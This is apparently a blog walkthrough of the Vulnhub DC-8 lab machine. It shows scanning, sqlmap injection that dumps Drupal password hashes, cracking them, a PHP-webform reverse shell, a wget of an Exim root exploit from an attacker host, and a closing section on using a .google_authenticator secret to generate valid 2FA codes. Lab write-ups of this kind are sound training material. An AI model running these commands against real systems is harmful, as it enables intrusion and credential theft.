Vulnhub DC_8

Preface

vulnhub dc8

https://www.vulnhub.com/entry/dc-8,367/

Target IP

192.168.1.13

Information gathering

nmap -p- --min-rate 10000 192.168.1.13 -oN nmap/port.txt
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sT -sC -sV -O -p22,80 192.168.1.13 -oN nmap/detail.txt
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
MAC Address: 08:00:27:8C:51:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • Open ports
    • 22/tcp: SSH (OpenSSH 7.4p1)
    • 80/tcp: HTTP (Apache, running Drupal 7)
  • CMS: Drupal 7
  • OS: Linux 3.2 - 4.14

dirsearch -u http://192.168.1.13 -i 200,301
[07:01:14] 200 -   33KB - /CHANGELOG.txt
[07:01:16] 200 - 769B - /COPYRIGHT.txt
[07:01:29] 301 - 237B - /includes -> http://192.168.1.13/includes/
[07:01:31] 200 - 868B - /INSTALL.mysql.txt
[07:01:31] 200 - 1KB - /install.php
[07:01:31] 200 - 842B - /INSTALL.pgsql.txt
[07:01:31] 200 - 1KB - /install.php?profile=default
[07:01:32] 200 - 6KB - /INSTALL.txt
[07:01:35] 200 - 7KB - /LICENSE.txt
[07:01:38] 200 - 2KB - /MAINTAINERS.txt
[07:01:40] 301 - 233B - /misc -> http://192.168.1.13/misc/
[07:01:41] 301 - 236B - /modules -> http://192.168.1.13/modules/
[07:01:44] 200 - 2KB - /node
[07:01:52] 301 - 237B - /profiles -> http://192.168.1.13/profiles/
[07:01:53] 200 - 2KB - /README.txt
[07:01:55] 200 - 744B - /robots.txt
[07:01:56] 301 - 236B - /scripts -> http://192.168.1.13/scripts/
[07:01:59] 301 - 234B - /sites -> http://192.168.1.13/sites/
[07:01:59] 200 - 129B - /sites/all/libraries/README.txt
[07:01:59] 200 - 0B - /sites/example.sites.php
[07:01:59] 200 - 545B - /sites/all/themes/README.txt
[07:01:59] 200 - 715B - /sites/all/modules/README.txt
[07:01:59] 200 - 431B - /sites/README.txt
[07:02:05] 301 - 235B - /themes -> http://192.168.1.13/themes/
[07:02:08] 200 - 3KB - /UPGRADE.txt
[07:02:09] 200 - 2KB - /user
[07:02:09] 200 - 2KB - /user/
[07:02:09] 200 - 2KB - /user/login/
[07:02:11] 200 - 177B - /views/ajax/autocomplete/user/a
[07:02:13] 200 - 2KB - /web.config
[07:02:16] 200 - 42B - /xmlrpc.php

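After going through the directories one by one, nothing useful turned up.

SQL injection

The Detail section of the home page takes a parameter that is vulnerable to SQL injection
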
http://192.168.1.13/?nid=1
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent

[*] d7db
[*] information_schema
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db --tables



| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent -D d7db -T users --dump

Username  Email                  Password hash (Drupal 7 $S$)
admin     dcau-user@outlook.com  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john      john@blahsdfsfd.org    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

Cracking

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Credentials obtained

john:turtle

Successfully logged in to the admin backend

GetShell

After logging in to the admin backend, PHP code can be entered under Contact Us -> Webform -> Form settings

Submitting the Contact Us form then loads the page that contains the injected code

Reverse shell

Exim privilege escalation

A search for SUID binaries turns up exim4

Check the version

/usr/sbin/exim4 -bV

Exim version 4.89 #2 built 14-Jun-2017 05:03:07
searchsploit exim | grep "Privilege"
wget http://192.168.1.17:8080/46996.sh
chmod +x 46996.sh
./46996.sh -m netcat

Getting the flag

Brilliant - you have succeeded!!!






888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888






Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.


I'm also sending out an especially big thanks to:


@4nqr34z
@D4mianWayne
@0xmzfr
@theart42


This challenge was largely based on two things:


1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42


The answer to that question is...


If you enjoyed this CTF, send me a tweet via @DCAU7.

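2FA authentication

The author mentions 2FA (two-factor authentication) in the challenge.

Simply put, authentication requires both the password and a verification code generated dynamically from a secret key.

With root already obtained, experiment with 2FA

  • /var/log/auth.log: records all events related to **authentication**.

  • .google_authenticator: stores the secret key seed created when the user enabled Google Authenticator

/var/log/auth.log shows that dc8user has 2FA configured

The .google_authenticator file was obtained from dc8user's home directory

NRJWQLHCQYKWD27G2GW4XFBR7Q   <-- 1. Secret key
" WINDOW_SIZE 17             <-- 2. Window size (allowed time drift)
" TOTP_AUTH                  <-- 3. Authentication type (time-based one-time password)
27017752                     <-- 4. Backup code (scratch code 1)
93723285                     <-- 5. Backup code (scratch code 2)
97959003                     <-- 6. Backup code (scratch code 3)
36240515                     <-- 7. Backup code (scratch code 4)

Generate the verification code from the secret key
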
oathtool --totp -b NRJWQLHCQYKWD27G2GW4XFBR7Q

dc8user can then be logged in to from Kali without a password

Enter the verification code
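
Why the contents of .google_authenticator are equivalent to the second factor, as an added example (not from the original post): it parses a file in the layout shown above and derives RFC 6238 codes from the secret, including how many codes are valid at once for a given WINDOW_SIZE. The sample file, the RFC 6238 test key in it, the scratch codes and the function names are constructed for illustration, and the centred window is this example's model of WINDOW_SIZE.

```python
import base64
import hashlib
import hmac
import struct

# Constructed sample file in the layout shown above. The secret is the
# RFC 6238 test key ("12345678901234567890" in Base32), not the page's.
SAMPLE_FILE = '''GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" WINDOW_SIZE 17
" TOTP_AUTH
11111111
22222222
'''


def parse_secret_file(text):
    """Split the file into (secret, options, scratch codes)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    secret, options, scratch = lines[0], {}, []
    for ln in lines[1:]:
        if ln.startswith('"'):  # option lines begin with a double quote
            parts = ln[1:].split()
            options[parts[0]] = parts[1] if len(parts) > 1 else True
        else:  # everything else is a one-time scratch code
            scratch.append(ln)
    return secret, options, scratch


def totp(secret_b32, unix_time, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1) for the given Unix time."""
    # The file stores unpadded Base32; restore '=' padding before decoding.
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation from RFC 4226
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def accepted_codes(secret_b32, unix_time, window):
    """Codes valid at unix_time when `window` adjacent 30 s steps are accepted.

    Assumption: the window is centred on the current time step.
    """
    first, last = -((window - 1) // 2), window // 2
    return [totp(secret_b32, unix_time + 30 * i) for i in range(first, last + 1)]
```

Under this model a WINDOW_SIZE of 17 keeps seventeen codes valid at any moment, about eight and a half minutes of tolerance, and every one of them is derivable by anyone who can read the file.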



Vulnhub DC_8
http://xiaowu5.cn/2026/02/24/Vulnhub-DC-8/
Author: 5
Published: February 24, 2026
License: BY XIAOWU